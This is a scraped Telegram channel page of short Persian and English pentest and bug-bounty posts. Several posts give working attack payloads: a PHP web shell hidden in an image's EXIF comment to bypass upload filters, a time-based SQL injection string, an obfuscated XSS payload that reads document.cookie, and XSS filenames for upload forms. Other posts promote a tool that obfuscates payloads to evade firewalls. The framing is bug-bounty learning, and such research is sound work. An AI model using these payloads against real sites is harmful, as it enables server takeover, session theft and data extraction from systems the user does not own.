Telegram Web Link
@cryptosignalsfree12

بچهایی که تو کار کریپتو هستن میتونید استفاده کنید
👍51
👍5
🗒 MetaMask Subdomain Takeover (Consensys) | $500 Bug Bounty Poc | Subdomain Takeover Method

https://youtu.be/xP-u9i3N-3U?si=ooLVhCem9w5aSWos


@PenTest_Tm
👍5
👍4
bounty_tips_100+.pdf
18.3 MB
🗒 Bug Bounty Tips


@PenTest_Tm
8🔥3👍1
🗒 XSS Payload Generator

تولید Payload با سناریو های مختلف و پشتیبانی از انواع متد با قابلیت ساخت پیلود برای دور زدن WAF و همچنین مبهم سازی پیلود و اضافه کردن کد جاوااسکریپت برای ساخت پیلود های پیشرفته تر و فیلتر پیشرفته کاراکترها برای دور زدن محدودیت هایی که هست


@PenTest_Tm
16👍3❤‍🔥2🤔1
🗒 Bypass File Upload Filtering

In image:


exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>'
shell.jpg
mv shell.jpg shell.php.jpg



@PenTest_Tm
2👍2
🗒 SQL Injection

After this, use sqlmap to extract the database

-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--


@PenTest_Tm
5❤‍🔥2
🗒 Bypass XSS Filter with Array


<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>"> 



@PenTest_Tm
🗿9👍4
بچها عیدتون مبارک ایشالا سال خوبی داشته باشین❤️
21🥰2👏1
🗒 File Upload via XSS

If you found a file upload function for an image, try introducing an image with XSS in the filename like so:
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png


@PenTest_Tm
8
APIs Fuzzing for Bug Bounty.pdf
164.9 KB
🗒 APIs Fuzzing for Bug Bounty


@PenTest_Tm
🔥9
API_Hacking_with_Javascript_Checklist.pdf
47.1 MB
🗒 API Hacking with Javascript Checklist


@PenTest_Tm
🔥10🍌3👍2
رسما بگا رفتیم احتمال زیاد وضعیت اینترنت خیلی بدتر میشه 🖤
😢17👍74🎉1
2025/07/08 13:29:32
Back to Top
HTML Embed Code: